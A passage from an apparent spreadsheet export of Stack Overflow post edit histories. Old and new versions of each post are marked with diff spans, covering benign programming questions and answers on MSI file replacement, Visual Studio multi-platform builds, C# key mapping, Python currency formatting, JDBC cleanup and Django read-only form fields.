 &lt;p&gt; Many of our customers have access to InstallShield, WISE or AdminStudio. These aren't a problem. I'm hoping there is some way I can provide our smaller customers &lt;strong&gt;without access to commercial repackaging tools&lt;/strong&gt; a freely available set of tools and steps to do the file replacement themselves.&lt;/p&gt; _x000D_
 &lt;p&gt; Only need to replace a single configuration file inside a compressed MSI, the target user can be assumed to already have Orca installed, know how to use this to customize the Property table (to embed license details for GPO deployment) and have generated an MST file.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;The file that needs to be replaced is less than 1kb.&lt;/strong&gt; So if rather than creating a CAB file I can leave it externally in the same folder as the MSI, or stream it directly into the binary table using Orca then that would be great! &lt;em&gt;= One less step for the customer ;)&lt;/em&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;&lt;span class="diff-add"&gt;:&lt;/span&gt; suggestions below don't quite work, when adding a medium with no cabinet file I get "Error 2920. Source directory not specified for file " However it &lt;span class="diff-add"&gt;does&lt;/span&gt; work if I use a cabinet file. Suggestions?&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;br&gt;&lt;br&gt; &lt;strong&gt;Disclaimer&lt;/strong&gt;: &lt;em&gt;this is very similar to &lt;a href="http://stackoverflow.com/questions/126562/how-to-replace-a-file-in-a-msi-installer"&gt;another question&lt;/a&gt; but both questions and answers in that thread are not clear.&lt;/em&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>saschabeaumont</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We are developing a number of games on multiple paltforms (DS/Wii/Xbox 360/PS3/PC/PSP). Each has their own compiler/linker and debugger. We want to use Visual Studio as the IDE and to manage the build process but use the platform specific compilers (and settings) to generate the appropriate output. We could manage the build process outside of VS (using jam or ant say) but this is not the preffered solution.&lt;/p&gt; _x000D_
 &lt;p&gt; Trawling the web, this seems to be a common problem but no-one has a good solution. Has anyone solved this problem? What's the best way of handling this.&lt;/p&gt; _x000D_
 &lt;p&gt; A number of solutions spring to mind - auto-generate nant scripts from the &lt;span class="diff-delete"&gt;solution&lt;/span&gt; in a pre-build step (probably the least work but still not ideal), replace cl.exe and link.exe with stub apps, use msbuild (but this is geared towards .net development and not native code), write a custom VS plug-in (lots of work - any pointers to an existing one either commercial or open soruce would be good). Anyone tried any of these? Was it good for you? ;)&lt;/p&gt; _x000D_
 &lt;p&gt; Cheers&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; We are developing a number of games on multiple paltforms (DS/Wii/Xbox 360/PS3/PC/PSP). Each has their own compiler/linker and debugger. We want to use Visual Studio as the IDE and to manage the build process but use the platform specific compilers (and settings) to generate the appropriate output. We could manage the build process outside of VS (using jam or ant say) but this is not the preffered solution.&lt;/p&gt; _x000D_
 &lt;p&gt; Trawling the web, this seems to be a common problem but no-one has a good solution. Has anyone solved this problem? What's the best way of handling this.&lt;/p&gt; _x000D_
 &lt;p&gt; A number of solutions spring to mind - auto-generate nant scripts from the &lt;span class="diff-add"&gt;solition&lt;/span&gt; in a pre-build step (probably the least work but still not ideal), replace cl.exe and link.exe with stub apps, use msbuild (but this is geared towards .net development and not native code), write a custom VS plug-in (lots of work - any pointers to an existing one either commercial or open soruce would be good). Anyone tried any of these? Was it good for you? ;)&lt;/p&gt; _x000D_
 &lt;p&gt; Cheers&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Gwaredd</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Yes, I did use the MapVirtualKey method. But I was expecting more details on how to use it: what DllImport directive to use, what enum is specific for mapping to characters, etc.&lt;/p&gt; _x000D_
 &lt;p&gt; I don't like these answers where you google for like 5 seconds and then just suggest a solution: the real challenge is to put all the pieces together and not have to waste your time with tons of sample-less MSDN pages or other coding forums in order to get your answer. No offense plinth, but your answer (even good) was worhtless since I had this answer even before posting my question on the forum!&lt;/p&gt; _x000D_
 &lt;p&gt; So there you go, I am going to post what I was looking for - an out-of-the-box C# solution:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Place this directive inside your class: [DllImport("user32.dll")] static extern int MapVirtualKey(uint uCode, uint uMapType);&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Retrieve your char like this:&lt;/p&gt; &lt;p&gt;&lt;span class="diff-delete"&gt; protected override bool ProcessCmdKey(ref Message msg, Keys keyData)&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;p&gt;&lt;span class="diff-delete"&gt;{ const int WM_KEYDOWN = 0x100;&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;  &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (msg.Msg == WM_KEYDOWN)_x000D_
  {            _x000D_
     &lt;span class="hljs-comment"&gt;// 2 is used to translate into an unshifted character value &lt;/span&gt;_x000D_
     &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; nonVirtualKey = MapVirtualKey((&lt;span class="hljs-built_in"&gt;uint&lt;/span&gt;)keyData, &lt;span class="hljs-number"&gt;2&lt;/span&gt;);_x000D_
_x000D_
     &lt;span class="hljs-built_in"&gt;char&lt;/span&gt; mappedChar = Convert.ToChar(nonVirtualKey);_x000D_
  }_x000D_
_x000D_
  &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-keyword"&gt;base&lt;/span&gt;.ProcessCmdKey(&lt;span class="hljs-keyword"&gt;ref&lt;/span&gt; msg, keyData);_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;p&gt;&lt;span class="diff-delete"&gt;}&lt;/span&gt;&lt;/p&gt;&lt;span class="diff-delete"&gt; &lt;/span&gt;&lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;p&gt; Thanks for caring... and enjoy!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Yes, I did use the MapVirtualKey method. But I was expecting more details on how to use it: what DllImport directive to use, what enum is specific for mapping to characters, etc.&lt;/p&gt; _x000D_
 &lt;p&gt; I don't like these answers where you google for like 5 seconds and then just suggest a solution: the real challenge is to put all the pieces together and not have to waste your time with tons of sample-less MSDN pages or other coding forums in order to get your answer. No offense plinth, but your answer (even good) was worhtless since I had this answer even before posting my question on the forum!&lt;/p&gt; _x000D_
 &lt;p&gt; So there you go, I am going to post what I was looking for - an out-of-the-box C# solution:&lt;/p&gt; _x000D_
 &lt;ol&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Place this directive inside your class: [DllImport("user32.dll")] static extern int MapVirtualKey(uint uCode, uint uMapType);&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Retrieve your char like this:&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ol&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; protected override bool ProcessCmdKey(ref Message msg, Keys keyData)&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre class="lang-cs s-code-block hljs csharp"&gt;&lt;code&gt;&lt;span class="diff-add"&gt;  {_x000D_
     &lt;span class="hljs-keyword"&gt;const&lt;/span&gt; &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; WM_KEYDOWN = &lt;span class="hljs-number"&gt;0x100&lt;/span&gt;;_x000D_
_x000D_
     &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; (msg.Msg == WM_KEYDOWN)_x000D_
     {            _x000D_
        &lt;span class="hljs-comment"&gt;// 2 is used to translate into an unshifted character value &lt;/span&gt;_x000D_
        &lt;span class="hljs-built_in"&gt;int&lt;/span&gt; nonVirtualKey = MapVirtualKey((&lt;span class="hljs-built_in"&gt;uint&lt;/span&gt;)keyData, &lt;span class="hljs-number"&gt;2&lt;/span&gt;);_x000D_
_x000D_
        &lt;span class="hljs-built_in"&gt;char&lt;/span&gt; mappedChar = Convert.ToChar(nonVirtualKey);_x000D_
     }_x000D_
_x000D_
     &lt;span class="hljs-keyword"&gt;return&lt;/span&gt; &lt;span class="hljs-keyword"&gt;base&lt;/span&gt;.ProcessCmdKey(&lt;span class="hljs-keyword"&gt;ref&lt;/span&gt; msg, keyData);_x000D_
  }_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Thanks for caring... and enjoy!&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>epatel</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;For python2.5&lt;/span&gt;, &lt;span class="diff-delete"&gt;you should probably use currency function in locale.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; If you're using python2&lt;/span&gt;.&lt;span class="diff-delete"&gt;4 or earlier, then this might make sense:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I've spent considerable time of getting that right, there are three main issues that differs from locale to locale:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; currency symbol and direction&lt;/li&gt; _x000D_
  &lt;li&gt; thousand separator&lt;/li&gt; _x000D_
  &lt;li&gt; decimal point&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I've written my own rather extensive implementation of this which is part of the kiwi python framework, check out the LGPL:ed source here:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://svn.async.com.br/cgi-bin/viewvc.cgi/kiwi/trunk/kiwi/currency.py?view=markup" rel="nofollow noreferrer"&gt;http://svn.async.com.br/cgi-bin/viewvc.cgi/kiwi/trunk/kiwi/currency.py?view=markup&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; The code is slightly Linux/Glibc specific, but shouldn't be too difficult to adopt to windows or other unixes.&lt;/p&gt; _x000D_
 &lt;p&gt; Once you have that installed you can do the following:&lt;/p&gt; _x000D_
 &lt;pre&gt;&amp;gt;&amp;gt;&amp;gt; from kiwi.datatypes import currency_x000D_
&amp;gt;&amp;gt;&amp;gt; v = currency('10.5').format()_x000D_
&lt;/pre&gt; _x000D_
 &lt;p&gt; Which will then give you:&lt;/p&gt; _x000D_
 &lt;pre&gt;'$10.50'&lt;/pre&gt; _x000D_
 &lt;p&gt; or&lt;/p&gt; _x000D_
 &lt;pre&gt;'10,50 kr'&lt;/pre&gt; _x000D_
 &lt;p&gt; Depending on the currently selected locale.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;Oh&lt;/span&gt;, &lt;span class="diff-add"&gt;that's an interesting beast&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;p&gt; I've spent considerable time of getting that right, there are three main issues that differs from locale to locale:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; currency symbol and direction&lt;/li&gt; _x000D_
  &lt;li&gt; thousand separator&lt;/li&gt; _x000D_
  &lt;li&gt; decimal point&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; I've written my own rather extensive implementation of this which is part of the kiwi python framework, check out the LGPL:ed source here:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;a href="http://svn.async.com.br/cgi-bin/viewvc.cgi/kiwi/trunk/kiwi/currency.py?view=markup" rel="nofollow noreferrer"&gt;http://svn.async.com.br/cgi-bin/viewvc.cgi/kiwi/trunk/kiwi/currency.py?view=markup&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; The code is slightly Linux/Glibc specific, but shouldn't be too difficult to adopt to windows or other unixes.&lt;/p&gt; _x000D_
 &lt;p&gt; Once you have that installed you can do the following:&lt;/p&gt; _x000D_
 &lt;pre&gt;&amp;gt;&amp;gt;&amp;gt; from kiwi.datatypes import currency_x000D_
&amp;gt;&amp;gt;&amp;gt; v = currency('10.5').format()_x000D_
&lt;/pre&gt; _x000D_
 &lt;p&gt; Which will then give you:&lt;/p&gt; _x000D_
 &lt;pre&gt;'$10.50'&lt;/pre&gt; _x000D_
 &lt;p&gt; or&lt;/p&gt; _x000D_
 &lt;pre&gt;'10,50 kr'&lt;/pre&gt; _x000D_
 &lt;p&gt; Depending on the currently selected locale.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Johan Dahlin</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Can we convert a hex string to a byte array using a built-in function in C# or do I have to make a custom method for this?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;blockquote&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
  &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;Possible Duplicate:&lt;/span&gt;&lt;/strong&gt;&lt;br&gt;&lt;span class="diff-add"&gt; &lt;/span&gt;&lt;a href="https://stackoverflow.com/questions/311165/how-do-you-convert-byte-array-to-hexadecimal-string-and-vice-versa-in-c"&gt;&lt;span class="diff-add"&gt;How do you convert Byte Array to Hexadecimal String, and vice versa, in C#?&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
  &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;/blockquote&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; Can we convert a hex string to a byte array using a built-in function in C# or do I have to make a custom method for this?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Rob</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;PreparedStatement ps = null;_x000D_
ResultSet rs = null;_x000D_
try {_x000D_
  ps = conn.createStatement(myQueryString);_x000D_
  rs = ps.executeQuery();_x000D_
  // process the results..._x000D_
} catch (java.sql.SQLException e) {_x000D_
  log.error("an error!", e);_x000D_
  throw new MyAppException("I'm sorry. Your query did not work.");_x000D_
} finally {_x000D_
  ps.close();_x000D_
  rs.close();_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The above does not compile, because both &lt;code&gt;PreparedStatement.close()&lt;/code&gt; and &lt;code&gt;ResultSet.close()&lt;/code&gt; throw a &lt;code&gt;java.sql.SQLException&lt;/code&gt;. So do I add a try/catch block to the finally clause? Or move the close statements into the try clause? Or just not bother calling close?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Consider the code:&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;PreparedStatement ps = null;_x000D_
ResultSet rs = null;_x000D_
try {_x000D_
  ps = conn.createStatement(myQueryString);_x000D_
  rs = ps.executeQuery();_x000D_
  // process the results..._x000D_
} catch (java.sql.SQLException e) {_x000D_
  log.error("an error!", e);_x000D_
  throw new MyAppException("I'm sorry. Your query did not work.");_x000D_
} finally {_x000D_
  ps.close();_x000D_
  rs.close();_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; The above does not compile, because both &lt;code&gt;PreparedStatement.close()&lt;/code&gt; and &lt;code&gt;ResultSet.close()&lt;/code&gt; throw a &lt;code&gt;java.sql.SQLException&lt;/code&gt;. So do I add a try/catch block to the finally clause? Or move the close statements into the try clause? Or just not bother calling close?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Uri</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-delete"&gt;Apple retail stores are looking to move away from Windows Mobile-based handheld checkout devices&lt;/span&gt; in &lt;span class="diff-delete"&gt;favor&lt;/span&gt; of &lt;span class="diff-delete"&gt;iPod touches with custom accessory add-ons&lt;/span&gt;, &lt;span class="diff-delete"&gt;with a transition expected&lt;/span&gt; to &lt;span class="diff-delete"&gt;follow&lt;/span&gt; the &lt;span class="diff-delete"&gt;release of iPhone 3&lt;/span&gt;.&lt;span class="diff-delete"&gt;0 later this year&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;[Option 2 is] NOT the most normalized option [as @Ray claims]. The most normalized would have no nullable fields and obviously option 2 would require a null on every row.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; At this point&lt;/span&gt; in &lt;span class="diff-add"&gt;your design you have to think about the usage, the queries you'll do, the reports you'll write. Will you want to do math on all&lt;/span&gt; of &lt;span class="diff-add"&gt;the numeric responses at the same time? i.e. WHERE numeric_response IS NOT NULL? Probably unlikely.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; More likely would be&lt;/span&gt;, &lt;span class="diff-add"&gt;What's the average response WHERE Question = 11. In those cases you can either choose the INT table or the INT column and neither would be easier&lt;/span&gt; to &lt;span class="diff-add"&gt;do than&lt;/span&gt; the &lt;span class="diff-add"&gt;other&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; If you did do two tables, you'd more than likely be constantly unioning them together for questions like, what % of questions have a response etc&lt;/span&gt;.&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; Can you see how the questions you ask your database to answer start to drive the design?&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Dan Lew</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a free API or some other way to determine what carrier a cell phone number is registered with?&lt;/p&gt; _x000D_
 &lt;p&gt; I'd like my application to broadcast text messages without them picking their carrier from a list.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; Interestingly, a coworker found the answer: &lt;a href="http://developer.whitepages.com/" rel="nofollow noreferrer"&gt;http://developer.whitepages.com/&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Is there a free API or some other way to determine what carrier a cell phone number is registered with?&lt;/p&gt; _x000D_
 &lt;p&gt; I'd like my application to broadcast text messages without them picking their carrier from a list.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;UPDATE:&lt;/strong&gt; Interestingly, a coworker found the answer: &lt;a href="http://developer.whitepages.com/" rel="nofollow noreferrer"&gt;http://developer.whitepages.com/&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;span class="diff-add"&gt;UPDATE2:&lt;/span&gt;&lt;/strong&gt;&lt;span class="diff-add"&gt; Well the whitepages license agreement is so restrictive that you can't build an app for it. Any other ideas?&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-add"&gt; &lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>NotMe</t>
  </si>
  <si>
    <t>adroit</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How would you get a reference to an executing class several stack frames &lt;span class="diff-delete"&gt;above&lt;/span&gt; the current one?&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; For&lt;/span&gt; example, if you have:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Class a { _x000D_
    foo() {_x000D_
        new b().bar();_x000D_
    }_x000D_
}_x000D_
_x000D_
Class b {_x000D_
    bar() {_x000D_
        ..._x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; Is there a way to get the value that would be retrieved by using &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;this&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; in &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;foo()&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt; while the thread is executing &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;bar()&lt;/span&gt;&lt;/code&gt;&lt;span class="diff-delete"&gt;?&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; How would you get a reference to an executing class several stack frames &lt;span class="diff-add"&gt;abouve&lt;/span&gt; the current one?&lt;span class="diff-add"&gt; For&lt;/span&gt; example, if you have:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;Class a { _x000D_
    foo() {_x000D_
        new b().bar();_x000D_
    }_x000D_
}_x000D_
_x000D_
Class b {_x000D_
    bar() {_x000D_
        ..._x000D_
    }_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;span class="diff-add"&gt; Is there a way to get the value that would be retrieved by using 'this' in foo() while the thread is executing bar()?&lt;/span&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Nathaniel Flath</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-delete"&gt; See also SO question: &lt;/span&gt;&lt;a href="http://stackoverflow.com/questions/2902024/why-are-read-only-form-fields-in-django-a-bad-idea" title="Why are read-only form fields in Django a bad idea?"&gt;&lt;span class="diff-delete"&gt;Why are read-only form fields in Django a bad idea?&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
 &lt;span class="diff-delete"&gt; &lt;/span&gt; _x000D_
 &lt;p&gt; In a django form, how do I make a field read-only (or disabled)?&lt;/p&gt; _x000D_
 &lt;p&gt; When the form is being used to create a new entry, all fields should be enabled - but when the record is in update mode some fields need to be read-only.&lt;/p&gt; _x000D_
 &lt;p&gt; For example, when creating a new Item model, all fields must be editable, but while updating the record, is there a way to disable sku field so that it is visible but cannot be edited?&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs haskell"&gt;&lt;code&gt;&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-type"&gt;Item&lt;/span&gt;(&lt;span class="hljs-title"&gt;models&lt;/span&gt;.&lt;span class="hljs-type"&gt;Model&lt;/span&gt;):_x000D_
    sku = models.&lt;span class="hljs-type"&gt;CharField&lt;/span&gt;(&lt;span class="hljs-title"&gt;max_length&lt;/span&gt;=50)_x000D_
    description = models.&lt;span class="hljs-type"&gt;CharField&lt;/span&gt;(&lt;span class="hljs-title"&gt;max_length&lt;/span&gt;=200)    _x000D_
    added_by = models.&lt;span class="hljs-type"&gt;ForeignKey&lt;/span&gt;(&lt;span class="hljs-type"&gt;User&lt;/span&gt;)    _x000D_
_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-type"&gt;ItemForm&lt;/span&gt;(&lt;span class="hljs-type"&gt;ModelForm&lt;/span&gt;):_x000D_
    &lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-type"&gt;Meta&lt;/span&gt;:_x000D_
        model = &lt;span class="hljs-type"&gt;Item&lt;/span&gt;_x000D_
        exclude = ('&lt;span class="hljs-title"&gt;added_by'&lt;/span&gt;)      _x000D_
_x000D_
def new_item_view(&lt;span class="hljs-title"&gt;request&lt;/span&gt;):     _x000D_
    if request.method == '&lt;span class="hljs-type"&gt;POST'&lt;/span&gt;:_x000D_
        form = &lt;span class="hljs-type"&gt;ItemForm&lt;/span&gt;(&lt;span class="hljs-title"&gt;request&lt;/span&gt;.&lt;span class="hljs-type"&gt;POST&lt;/span&gt;)_x000D_
        #validate and save_x000D_
    else:_x000D_
            form = &lt;span class="hljs-type"&gt;ItemForm&lt;/span&gt;()       _x000D_
    #render the view_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Can class ItemForm be reused? What changes would be required in ItemForm or Item model class? Would I need to write another class, "ItemUpdateForm", for updating the item?&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;def&lt;/span&gt; &lt;span class="hljs-title"&gt;update_item_view&lt;/span&gt;(&lt;span class="hljs-params"&gt;request&lt;/span&gt;):&lt;/span&gt;      _x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; request.method == &lt;span class="hljs-string"&gt;'POST'&lt;/span&gt;:_x000D_
        form = ItemUpdateForm(request.POST)_x000D_
        &lt;span class="hljs-comment"&gt;#validate and save&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;else&lt;/span&gt;:_x000D_
        form = ItemUpdateForm()_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; In a django form, how do I make a field read-only (or disabled)?&lt;/p&gt; _x000D_
 &lt;p&gt; When the form is being used to create a new entry, all fields should be enabled - but when the record is in update mode some fields need to be read-only.&lt;/p&gt; _x000D_
 &lt;p&gt; For example, when creating a new Item model, all fields must be editable, but while updating the record, is there a way to disable sku field so that it is visible but cannot be edited?&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs haskell"&gt;&lt;code&gt;&lt;span class="hljs-class"&gt;&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-type"&gt;Item&lt;/span&gt;(&lt;span class="hljs-title"&gt;models&lt;/span&gt;.&lt;span class="hljs-type"&gt;Model&lt;/span&gt;):_x000D_
    sku = models.&lt;span class="hljs-type"&gt;CharField&lt;/span&gt;(&lt;span class="hljs-title"&gt;max_length&lt;/span&gt;=50)_x000D_
    description = models.&lt;span class="hljs-type"&gt;CharField&lt;/span&gt;(&lt;span class="hljs-title"&gt;max_length&lt;/span&gt;=200)    _x000D_
    added_by = models.&lt;span class="hljs-type"&gt;ForeignKey&lt;/span&gt;(&lt;span class="hljs-type"&gt;User&lt;/span&gt;)    _x000D_
_x000D_
_x000D_
&lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-type"&gt;ItemForm&lt;/span&gt;(&lt;span class="hljs-type"&gt;ModelForm&lt;/span&gt;):_x000D_
    &lt;span class="hljs-keyword"&gt;class&lt;/span&gt; &lt;span class="hljs-type"&gt;Meta&lt;/span&gt;:_x000D_
        model = &lt;span class="hljs-type"&gt;Item&lt;/span&gt;_x000D_
        exclude = ('&lt;span class="hljs-title"&gt;added_by'&lt;/span&gt;)      _x000D_
_x000D_
def new_item_view(&lt;span class="hljs-title"&gt;request&lt;/span&gt;):     _x000D_
    if request.method == '&lt;span class="hljs-type"&gt;POST'&lt;/span&gt;:_x000D_
        form = &lt;span class="hljs-type"&gt;ItemForm&lt;/span&gt;(&lt;span class="hljs-title"&gt;request&lt;/span&gt;.&lt;span class="hljs-type"&gt;POST&lt;/span&gt;)_x000D_
        #validate and save_x000D_
    else:_x000D_
            form = &lt;span class="hljs-type"&gt;ItemForm&lt;/span&gt;()       _x000D_
    #render the view_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Can class ItemForm be reused? What changes would be required in ItemForm or Item model class? Would I need to write another class, "ItemUpdateForm", for updating the item?&lt;/p&gt; _x000D_
 &lt;pre class="default s-code-block hljs python"&gt;&lt;code&gt;&lt;span class="hljs-function"&gt;&lt;span class="hljs-keyword"&gt;def&lt;/span&gt; &lt;span class="hljs-title"&gt;update_item_view&lt;/span&gt;(&lt;span class="hljs-params"&gt;request&lt;/span&gt;):&lt;/span&gt;      _x000D_
    &lt;span class="hljs-keyword"&gt;if&lt;/span&gt; request.method == &lt;span class="hljs-string"&gt;'POST'&lt;/span&gt;:_x000D_
        form = ItemUpdateForm(request.POST)_x000D_
        &lt;span class="hljs-comment"&gt;#validate and save&lt;/span&gt;_x000D_
    &lt;span class="hljs-keyword"&gt;else&lt;/span&gt;:_x000D_
        form = ItemUpdateForm()_x000D_
